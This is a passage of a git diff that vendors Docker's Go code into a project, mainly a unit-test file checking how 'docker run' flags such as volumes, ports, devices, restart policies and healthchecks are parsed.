+ array = append(array, raw[left:right]) + left = right + 1 + numberOfParts++ + } + // else, `C:` is considered as a drive letter and not as a delimiter, so we continue parsing. + } + // if right == 1, then `C:` is the beginning of the raw string, therefore `:` is again not considered a delimiter and we continue parsing. + } else { + // if `:` is not preceded by a potential drive letter, then consider it as a delimiter. + array = append(array, raw[left:right]) + left = right + 1 + numberOfParts++ + } + } + // need to take care of the last part + if left < len(raw) { + if n >= 0 && numberOfParts >= n { + // if the maximum number of parts is reached, just append the rest to the last part + // left-1 is at the last `:` that needs to be included since not considered a separator. + array[n-1] += raw[left-1:] + } else { + array = append(array, raw[left:]) + } + } + return array +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse_test.go b/vendor/github.com/docker/docker/runconfig/opts/parse_test.go new file mode 100644 index 0000000000..a1be379ae8 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/parse_test.go @@ -0,0 +1,894 @@ +package opts + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "os" + "runtime" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/runconfig" + "github.com/docker/go-connections/nat" + "github.com/spf13/pflag" +) + +func parseRun(args []string) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { + flags := pflag.NewFlagSet("run", pflag.ContinueOnError) + flags.SetOutput(ioutil.Discard) + flags.Usage = nil + copts := AddFlags(flags) + if err := flags.Parse(args); err != nil { + return nil, nil, nil, err + } + return Parse(flags, copts) +} + +func parse(t *testing.T, args string) (*container.Config, *container.HostConfig, error) { + config, 
hostConfig, _, err := parseRun(strings.Split(args+" ubuntu bash", " ")) + return config, hostConfig, err +} + +func mustParse(t *testing.T, args string) (*container.Config, *container.HostConfig) { + config, hostConfig, err := parse(t, args) + if err != nil { + t.Fatal(err) + } + return config, hostConfig +} + +func TestParseRunLinks(t *testing.T) { + if _, hostConfig := mustParse(t, "--link a:b"); len(hostConfig.Links) == 0 || hostConfig.Links[0] != "a:b" { + t.Fatalf("Error parsing links. Expected []string{\"a:b\"}, received: %v", hostConfig.Links) + } + if _, hostConfig := mustParse(t, "--link a:b --link c:d"); len(hostConfig.Links) < 2 || hostConfig.Links[0] != "a:b" || hostConfig.Links[1] != "c:d" { + t.Fatalf("Error parsing links. Expected []string{\"a:b\", \"c:d\"}, received: %v", hostConfig.Links) + } + if _, hostConfig := mustParse(t, ""); len(hostConfig.Links) != 0 { + t.Fatalf("Error parsing links. No link expected, received: %v", hostConfig.Links) + } +} + +func TestParseRunAttach(t *testing.T) { + if config, _ := mustParse(t, "-a stdin"); !config.AttachStdin || config.AttachStdout || config.AttachStderr { + t.Fatalf("Error parsing attach flags. Expect only Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) + } + if config, _ := mustParse(t, "-a stdin -a stdout"); !config.AttachStdin || !config.AttachStdout || config.AttachStderr { + t.Fatalf("Error parsing attach flags. Expect only Stdin and Stdout enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) + } + if config, _ := mustParse(t, "-a stdin -a stdout -a stderr"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr { + t.Fatalf("Error parsing attach flags. Expect all attach enabled. 
Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) + } + if config, _ := mustParse(t, ""); config.AttachStdin || !config.AttachStdout || !config.AttachStderr { + t.Fatalf("Error parsing attach flags. Expect Stdin disabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) + } + if config, _ := mustParse(t, "-i"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr { + t.Fatalf("Error parsing attach flags. Expect Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) + } + + if _, _, err := parse(t, "-a"); err == nil { + t.Fatalf("Error parsing attach flags, `-a` should be an error but is not") + } + if _, _, err := parse(t, "-a invalid"); err == nil { + t.Fatalf("Error parsing attach flags, `-a invalid` should be an error but is not") + } + if _, _, err := parse(t, "-a invalid -a stdout"); err == nil { + t.Fatalf("Error parsing attach flags, `-a stdout -a invalid` should be an error but is not") + } + if _, _, err := parse(t, "-a stdout -a stderr -d"); err == nil { + t.Fatalf("Error parsing attach flags, `-a stdout -a stderr -d` should be an error but is not") + } + if _, _, err := parse(t, "-a stdin -d"); err == nil { + t.Fatalf("Error parsing attach flags, `-a stdin -d` should be an error but is not") + } + if _, _, err := parse(t, "-a stdout -d"); err == nil { + t.Fatalf("Error parsing attach flags, `-a stdout -d` should be an error but is not") + } + if _, _, err := parse(t, "-a stderr -d"); err == nil { + t.Fatalf("Error parsing attach flags, `-a stderr -d` should be an error but is not") + } + if _, _, err := parse(t, "-d --rm"); err == nil { + t.Fatalf("Error parsing attach flags, `-d --rm` should be an error but is not") + } +} + +func TestParseRunVolumes(t *testing.T) { + + // A single volume + arr, tryit := setupPlatformVolume([]string{`/tmp`}, []string{`c:\tmp`}) + if config, 
hostConfig := mustParse(t, tryit); hostConfig.Binds != nil { + t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds) + } else if _, exists := config.Volumes[arr[0]]; !exists { + t.Fatalf("Error parsing volume flags, %q is missing from volumes. Received %v", tryit, config.Volumes) + } + + // Two volumes + arr, tryit = setupPlatformVolume([]string{`/tmp`, `/var`}, []string{`c:\tmp`, `c:\var`}) + if config, hostConfig := mustParse(t, tryit); hostConfig.Binds != nil { + t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds) + } else if _, exists := config.Volumes[arr[0]]; !exists { + t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[0], config.Volumes) + } else if _, exists := config.Volumes[arr[1]]; !exists { + t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[1], config.Volumes) + } + + // A single bind-mount + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`}) + if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || hostConfig.Binds[0] != arr[0] { + t.Fatalf("Error parsing volume flags, %q should mount-bind the path before the colon into the path after the colon. Received %v %v", arr[0], hostConfig.Binds, config.Volumes) + } + + // Two bind-mounts. + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/hostVar:/containerVar`}, []string{os.Getenv("ProgramData") + `:c:\ContainerPD`, os.Getenv("TEMP") + `:c:\containerTmp`}) + if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { + t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) + } + + // Two bind-mounts, first read-only, second read-write. 
+ // TODO Windows: The Windows version uses read-write as that's the only mode it supports. Can change this post TP4 + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro`, `/hostVar:/containerVar:rw`}, []string{os.Getenv("TEMP") + `:c:\containerTmp:rw`, os.Getenv("ProgramData") + `:c:\ContainerPD:rw`}) + if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { + t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) + } + + // Similar to previous test but with alternate modes which are only supported by Linux + if runtime.GOOS != "windows" { + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro,Z`, `/hostVar:/containerVar:rw,Z`}, []string{}) + if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { + t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) + } + + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:Z`, `/hostVar:/containerVar:z`}, []string{}) + if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { + t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) + } + } + + // One bind mount and one volume + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/containerVar`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`, `c:\containerTmp`}) + if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] { + t.Fatalf("Error parsing volume flags, %s and %s should only one and only one bind mount %s. 
Received %s", arr[0], arr[1], arr[0], hostConfig.Binds) + } else if _, exists := config.Volumes[arr[1]]; !exists { + t.Fatalf("Error parsing volume flags %s and %s. %s is missing from volumes. Received %v", arr[0], arr[1], arr[1], config.Volumes) + } + + // Root to non-c: drive letter (Windows specific) + if runtime.GOOS == "windows" { + arr, tryit = setupPlatformVolume([]string{}, []string{os.Getenv("SystemDrive") + `\:d:`}) + if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] || len(config.Volumes) != 0 { + t.Fatalf("Error parsing %s. Should have a single bind mount and no volumes", arr[0]) + } + } + +} + +// This tests the cases for binds which are generated through +// DecodeContainerConfig rather than Parse() +func TestDecodeContainerConfigVolumes(t *testing.T) { + + // Root to root + bindsOrVols, _ := setupPlatformVolume([]string{`/:/`}, []string{os.Getenv("SystemDrive") + `\:c:\`}) + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // No destination path + bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:`}, []string{os.Getenv("TEMP") + `\:`}) + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // // No destination path or mode + bindsOrVols, _ = setupPlatformVolume([]string{`/tmp::`}, []string{os.Getenv("TEMP") + `\::`}) + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + 
t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // A whole lot of nothing + bindsOrVols = []string{`:`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // A whole lot of nothing with no mode + bindsOrVols = []string{`::`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // Too much including an invalid mode + wTmp := os.Getenv("TEMP") + bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:/tmp:/tmp:/tmp`}, []string{wTmp + ":" + wTmp + ":" + wTmp + ":" + wTmp}) + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // Windows specific error tests + if runtime.GOOS == "windows" { + // Volume which does not include a drive letter + bindsOrVols = []string{`\tmp`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // Root to C-Drive + bindsOrVols = []string{os.Getenv("SystemDrive") + `\:c:`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // Container 
path that does not include a drive letter + bindsOrVols = []string{`c:\windows:\somewhere`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + } + + // Linux-specific error tests + if runtime.GOOS != "windows" { + // Just root + bindsOrVols = []string{`/`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // A single volume that looks like a bind mount passed in Volumes. + // This should be handled as a bind mount, not a volume. + vols := []string{`/foo:/bar`} + if config, hostConfig, err := callDecodeContainerConfig(vols, nil); err != nil { + t.Fatal("Volume /foo:/bar should have succeeded as a volume name") + } else if hostConfig.Binds != nil { + t.Fatalf("Error parsing volume flags, /foo:/bar should not mount-bind anything. Received %v", hostConfig.Binds) + } else if _, exists := config.Volumes[vols[0]]; !exists { + t.Fatalf("Error parsing volume flags, /foo:/bar is missing from volumes. Received %v", config.Volumes) + } + + } +} + +// callDecodeContainerConfig is a utility function used by TestDecodeContainerConfigVolumes +// to call DecodeContainerConfig. It effectively does what a client would +// do when calling the daemon by constructing a JSON stream of a +// ContainerConfigWrapper which is populated by the set of volume specs +// passed into it. It returns a config and a hostconfig which can be +// validated to ensure DecodeContainerConfig has manipulated the structures +// correctly. 
+func callDecodeContainerConfig(volumes []string, binds []string) (*container.Config, *container.HostConfig, error) { + var ( + b []byte + err error + c *container.Config + h *container.HostConfig + ) + w := runconfig.ContainerConfigWrapper{ + Config: &container.Config{ + Volumes: map[string]struct{}{}, + }, + HostConfig: &container.HostConfig{ + NetworkMode: "none", + Binds: binds, + }, + } + for _, v := range volumes { + w.Config.Volumes[v] = struct{}{} + } + if b, err = json.Marshal(w); err != nil { + return nil, nil, fmt.Errorf("Error on marshal %s", err.Error()) + } + c, h, _, err = runconfig.DecodeContainerConfig(bytes.NewReader(b)) + if err != nil { + return nil, nil, fmt.Errorf("Error parsing %s: %v", string(b), err) + } + if c == nil || h == nil { + return nil, nil, fmt.Errorf("Empty config or hostconfig") + } + + return c, h, err +} + +// check if (a == c && b == d) || (a == d && b == c) +// because maps are randomized +func compareRandomizedStrings(a, b, c, d string) error { + if a == c && b == d { + return nil + } + if a == d && b == c { + return nil + } + return fmt.Errorf("strings don't match") +} + +// setupPlatformVolume takes two arrays of volume specs - a Unix style +// spec and a Windows style spec. Depending on the platform being unit tested, +// it returns one of them, along with a volume string that would be passed +// on the docker CLI (eg -v /bar -v /foo). 
+func setupPlatformVolume(u []string, w []string) ([]string, string) { + var a []string + if runtime.GOOS == "windows" { + a = w + } else { + a = u + } + s := "" + for _, v := range a { + s = s + "-v " + v + " " + } + return a, s +} + +// Simple parse with MacAddress validation +func TestParseWithMacAddress(t *testing.T) { + invalidMacAddress := "--mac-address=invalidMacAddress" + validMacAddress := "--mac-address=92:d0:c6:0a:29:33" + if _, _, _, err := parseRun([]string{invalidMacAddress, "img", "cmd"}); err != nil && err.Error() != "invalidMacAddress is not a valid mac address" { + t.Fatalf("Expected an error with %v mac-address, got %v", invalidMacAddress, err) + } + if config, _ := mustParse(t, validMacAddress); config.MacAddress != "92:d0:c6:0a:29:33" { + t.Fatalf("Expected the config to have '92:d0:c6:0a:29:33' as MacAddress, got '%v'", config.MacAddress) + } +} + +func TestParseWithMemory(t *testing.T) { + invalidMemory := "--memory=invalid" + validMemory := "--memory=1G" + if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err != nil && err.Error() != "invalid size: 'invalid'" { + t.Fatalf("Expected an error with '%v' Memory, got '%v'", invalidMemory, err) + } + if _, hostconfig := mustParse(t, validMemory); hostconfig.Memory != 1073741824 { + t.Fatalf("Expected the config to have '1G' as Memory, got '%v'", hostconfig.Memory) + } +} + +func TestParseWithMemorySwap(t *testing.T) { + invalidMemory := "--memory-swap=invalid" + validMemory := "--memory-swap=1G" + anotherValidMemory := "--memory-swap=-1" + if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err == nil || err.Error() != "invalid size: 'invalid'" { + t.Fatalf("Expected an error with '%v' MemorySwap, got '%v'", invalidMemory, err) + } + if _, hostconfig := mustParse(t, validMemory); hostconfig.MemorySwap != 1073741824 { + t.Fatalf("Expected the config to have '1073741824' as MemorySwap, got '%v'", hostconfig.MemorySwap) + } + if _, hostconfig := mustParse(t, 
anotherValidMemory); hostconfig.MemorySwap != -1 { + t.Fatalf("Expected the config to have '-1' as MemorySwap, got '%v'", hostconfig.MemorySwap) + } +} + +func TestParseHostname(t *testing.T) { + validHostnames := map[string]string{ + "hostname": "hostname", + "host-name": "host-name", + "hostname123": "hostname123", + "123hostname": "123hostname", + "hostname-of-63-bytes-long-should-be-valid-and-without-any-error": "hostname-of-63-bytes-long-should-be-valid-and-without-any-error", + } + hostnameWithDomain := "--hostname=hostname.domainname" + hostnameWithDomainTld := "--hostname=hostname.domainname.tld" + for hostname, expectedHostname := range validHostnames { + if config, _ := mustParse(t, fmt.Sprintf("--hostname=%s", hostname)); config.Hostname != expectedHostname { + t.Fatalf("Expected the config to have 'hostname' as hostname, got '%v'", config.Hostname) + } + } + if config, _ := mustParse(t, hostnameWithDomain); config.Hostname != "hostname.domainname" && config.Domainname != "" { + t.Fatalf("Expected the config to have 'hostname' as hostname.domainname, got '%v'", config.Hostname) + } + if config, _ := mustParse(t, hostnameWithDomainTld); config.Hostname != "hostname.domainname.tld" && config.Domainname != "" { + t.Fatalf("Expected the config to have 'hostname' as hostname.domainname.tld, got '%v'", config.Hostname) + } +} + +func TestParseWithExpose(t *testing.T) { + invalids := map[string]string{ + ":": "invalid port format for --expose: :", + "8080:9090": "invalid port format for --expose: 8080:9090", + "/tcp": "invalid range format for --expose: /tcp, error: Empty string specified for ports.", + "/udp": "invalid range format for --expose: /udp, error: Empty string specified for ports.", + "NaN/tcp": `invalid range format for --expose: NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, + "NaN-NaN/tcp": `invalid range format for --expose: NaN-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, + "8080-NaN/tcp": `invalid 
range format for --expose: 8080-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, + "1234567890-8080/tcp": `invalid range format for --expose: 1234567890-8080/tcp, error: strconv.ParseUint: parsing "1234567890": value out of range`, + } + valids := map[string][]nat.Port{ + "8080/tcp": {"8080/tcp"}, + "8080/udp": {"8080/udp"}, + "8080/ncp": {"8080/ncp"}, + "8080-8080/udp": {"8080/udp"}, + "8080-8082/tcp": {"8080/tcp", "8081/tcp", "8082/tcp"}, + } + for expose, expectedError := range invalids { + if _, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"}); err == nil || err.Error() != expectedError { + t.Fatalf("Expected error '%v' with '--expose=%v', got '%v'", expectedError, expose, err) + } + } + for expose, exposedPorts := range valids { + config, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.ExposedPorts) != len(exposedPorts) { + t.Fatalf("Expected %v exposed port, got %v", len(exposedPorts), len(config.ExposedPorts)) + } + for _, port := range exposedPorts { + if _, ok := config.ExposedPorts[port]; !ok { + t.Fatalf("Expected %v, got %v", exposedPorts, config.ExposedPorts) + } + } + } + // Merge with actual published port + config, _, _, err := parseRun([]string{"--publish=80", "--expose=80-81/tcp", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.ExposedPorts) != 2 { + t.Fatalf("Expected 2 exposed ports, got %v", config.ExposedPorts) + } + ports := []nat.Port{"80/tcp", "81/tcp"} + for _, port := range ports { + if _, ok := config.ExposedPorts[port]; !ok { + t.Fatalf("Expected %v, got %v", ports, config.ExposedPorts) + } + } +} + +func TestParseDevice(t *testing.T) { + valids := map[string]container.DeviceMapping{ + "/dev/snd": { + PathOnHost: "/dev/snd", + PathInContainer: "/dev/snd", + CgroupPermissions: "rwm", + }, + "/dev/snd:rw": { + PathOnHost: "/dev/snd", + PathInContainer: "/dev/snd", + 
CgroupPermissions: "rw", + }, + "/dev/snd:/something": { + PathOnHost: "/dev/snd", + PathInContainer: "/something", + CgroupPermissions: "rwm", + }, + "/dev/snd:/something:rw": { + PathOnHost: "/dev/snd", + PathInContainer: "/something", + CgroupPermissions: "rw", + }, + } + for device, deviceMapping := range valids { + _, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--device=%v", device), "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(hostconfig.Devices) != 1 { + t.Fatalf("Expected 1 devices, got %v", hostconfig.Devices) + } + if hostconfig.Devices[0] != deviceMapping { + t.Fatalf("Expected %v, got %v", deviceMapping, hostconfig.Devices) + } + } + +} + +func TestParseModes(t *testing.T) { + // ipc ko + if _, _, _, err := parseRun([]string{"--ipc=container:", "img", "cmd"}); err == nil || err.Error() != "--ipc: invalid IPC mode" { + t.Fatalf("Expected an error with message '--ipc: invalid IPC mode', got %v", err) + } + // ipc ok + _, hostconfig, _, err := parseRun([]string{"--ipc=host", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if !hostconfig.IpcMode.Valid() { + t.Fatalf("Expected a valid IpcMode, got %v", hostconfig.IpcMode) + } + // pid ko + if _, _, _, err := parseRun([]string{"--pid=container:", "img", "cmd"}); err == nil || err.Error() != "--pid: invalid PID mode" { + t.Fatalf("Expected an error with message '--pid: invalid PID mode', got %v", err) + } + // pid ok + _, hostconfig, _, err = parseRun([]string{"--pid=host", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if !hostconfig.PidMode.Valid() { + t.Fatalf("Expected a valid PidMode, got %v", hostconfig.PidMode) + } + // uts ko + if _, _, _, err := parseRun([]string{"--uts=container:", "img", "cmd"}); err == nil || err.Error() != "--uts: invalid UTS mode" { + t.Fatalf("Expected an error with message '--uts: invalid UTS mode', got %v", err) + } + // uts ok + _, hostconfig, _, err = parseRun([]string{"--uts=host", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + 
if !hostconfig.UTSMode.Valid() { + t.Fatalf("Expected a valid UTSMode, got %v", hostconfig.UTSMode) + } + // shm-size ko + if _, _, _, err = parseRun([]string{"--shm-size=a128m", "img", "cmd"}); err == nil || err.Error() != "invalid size: 'a128m'" { + t.Fatalf("Expected an error with message 'invalid size: a128m', got %v", err) + } + // shm-size ok + _, hostconfig, _, err = parseRun([]string{"--shm-size=128m", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if hostconfig.ShmSize != 134217728 { + t.Fatalf("Expected a valid ShmSize, got %d", hostconfig.ShmSize) + } +} + +func TestParseRestartPolicy(t *testing.T) { + invalids := map[string]string{ + "always:2:3": "invalid restart policy format", + "on-failure:invalid": "maximum retry count must be an integer", + } + valids := map[string]container.RestartPolicy{ + "": {}, + "always": { + Name: "always", + MaximumRetryCount: 0, + }, + "on-failure:1": { + Name: "on-failure", + MaximumRetryCount: 1, + }, + } + for restart, expectedError := range invalids { + if _, _, _, err := parseRun([]string{fmt.Sprintf("--restart=%s", restart), "img", "cmd"}); err == nil || err.Error() != expectedError { + t.Fatalf("Expected an error with message '%v' for %v, got %v", expectedError, restart, err) + } + } + for restart, expected := range valids { + _, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--restart=%v", restart), "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if hostconfig.RestartPolicy != expected { + t.Fatalf("Expected %v, got %v", expected, hostconfig.RestartPolicy) + } + } +} + +func TestParseHealth(t *testing.T) { + checkOk := func(args ...string) *container.HealthConfig { + config, _, _, err := parseRun(args) + if err != nil { + t.Fatalf("%#v: %v", args, err) + } + return config.Healthcheck + } + checkError := func(expected string, args ...string) { + config, _, _, err := parseRun(args) + if err == nil { + t.Fatalf("Expected error, but got %#v", config) + } + if err.Error() != expected { + 
t.Fatalf("Expected %#v, got %#v", expected, err) + } + } + health := checkOk("--no-healthcheck", "img", "cmd") + if health == nil || len(health.Test) != 1 || health.Test[0] != "NONE" { + t.Fatalf("--no-healthcheck failed: %#v", health) + } + + health = checkOk("--health-cmd=/check.sh -q", "img", "cmd") + if len(health.Test) != 2 || health.Test[0] != "CMD-SHELL" || health.Test[1] != "/check.sh -q" { + t.Fatalf("--health-cmd: got %#v", health.Test) + } + if health.Timeout != 0 { + t.Fatalf("--health-cmd: timeout = %f", health.Timeout) + } + + checkError("--no-healthcheck conflicts with --health-* options", + "--no-healthcheck", "--health-cmd=/check.sh -q", "img", "cmd") + + health = checkOk("--health-timeout=2s", "--health-retries=3", "--health-interval=4.5s", "img", "cmd") + if health.Timeout != 2*time.Second || health.Retries != 3 || health.Interval != 4500*time.Millisecond { + t.Fatalf("--health-*: got %#v", health) + } +} + +func TestParseLoggingOpts(t *testing.T) { + // logging opts ko + if _, _, _, err := parseRun([]string{"--log-driver=none", "--log-opt=anything", "img", "cmd"}); err == nil || err.Error() != "invalid logging opts for driver none" { + t.Fatalf("Expected an error with message 'invalid logging opts for driver none', got %v", err) + } + // logging opts ok + _, hostconfig, _, err := parseRun([]string{"--log-driver=syslog", "--log-opt=something", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if hostconfig.LogConfig.Type != "syslog" || len(hostconfig.LogConfig.Config) != 1 { + t.Fatalf("Expected a 'syslog' LogConfig with one config, got %v", hostconfig.RestartPolicy) + } +} + +func TestParseEnvfileVariables(t *testing.T) { + e := "open nonexistent: no such file or directory" + if runtime.GOOS == "windows" { + e = "open nonexistent: The system cannot find the file specified." 
+ } + // env ko + if _, _, _, err := parseRun([]string{"--env-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e { + t.Fatalf("Expected an error with message '%s', got %v", e, err) + } + // env ok + config, _, _, err := parseRun([]string{"--env-file=fixtures/valid.env", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.Env) != 1 || config.Env[0] != "ENV1=value1" { + t.Fatalf("Expected a config with [ENV1=value1], got %v", config.Env) + } + config, _, _, err = parseRun([]string{"--env-file=fixtures/valid.env", "--env=ENV2=value2", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.Env) != 2 || config.Env[0] != "ENV1=value1" || config.Env[1] != "ENV2=value2" { + t.Fatalf("Expected a config with [ENV1=value1 ENV2=value2], got %v", config.Env) + } +} + +func TestParseEnvfileVariablesWithBOMUnicode(t *testing.T) { + // UTF8 with BOM + config, _, _, err := parseRun([]string{"--env-file=fixtures/utf8.env", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + env := []string{"FOO=BAR", "HELLO=" + string([]byte{0xe6, 0x82, 0xa8, 0xe5, 0xa5, 0xbd}), "BAR=FOO"} + if len(config.Env) != len(env) { + t.Fatalf("Expected a config with %d env variables, got %v: %v", len(env), len(config.Env), config.Env) + } + for i, v := range env { + if config.Env[i] != v { + t.Fatalf("Expected a config with [%s], got %v", v, []byte(config.Env[i])) + } + } + + // UTF16 with BOM + e := "contains invalid utf8 bytes at line" + if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) { + t.Fatalf("Expected an error with message '%s', got %v", e, err) + } + // UTF16BE with BOM + if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16be.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) { + t.Fatalf("Expected an error with message '%s', got %v", e, err) + } +} + +func TestParseLabelfileVariables(t *testing.T) { + e := "open nonexistent: no such file 
or directory" + if runtime.GOOS == "windows" { + e = "open nonexistent: The system cannot find the file specified." + } + // label ko + if _, _, _, err := parseRun([]string{"--label-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e { + t.Fatalf("Expected an error with message '%s', got %v", e, err) + } + // label ok + config, _, _, err := parseRun([]string{"--label-file=fixtures/valid.label", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.Labels) != 1 || config.Labels["LABEL1"] != "value1" { + t.Fatalf("Expected a config with [LABEL1:value1], got %v", config.Labels) + } + config, _, _, err = parseRun([]string{"--label-file=fixtures/valid.label", "--label=LABEL2=value2", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.Labels) != 2 || config.Labels["LABEL1"] != "value1" || config.Labels["LABEL2"] != "value2" { + t.Fatalf("Expected a config with [LABEL1:value1 LABEL2:value2], got %v", config.Labels) + } +} + +func TestParseEntryPoint(t *testing.T) { + config, _, _, err := parseRun([]string{"--entrypoint=anything", "cmd", "img"}) + if err != nil { + t.Fatal(err) + } + if len(config.Entrypoint) != 1 && config.Entrypoint[0] != "anything" { + t.Fatalf("Expected entrypoint 'anything', got %v", config.Entrypoint) + } +} + +func TestValidateLink(t *testing.T) { + valid := []string{ + "name", + "dcdfbe62ecd0:alias", + 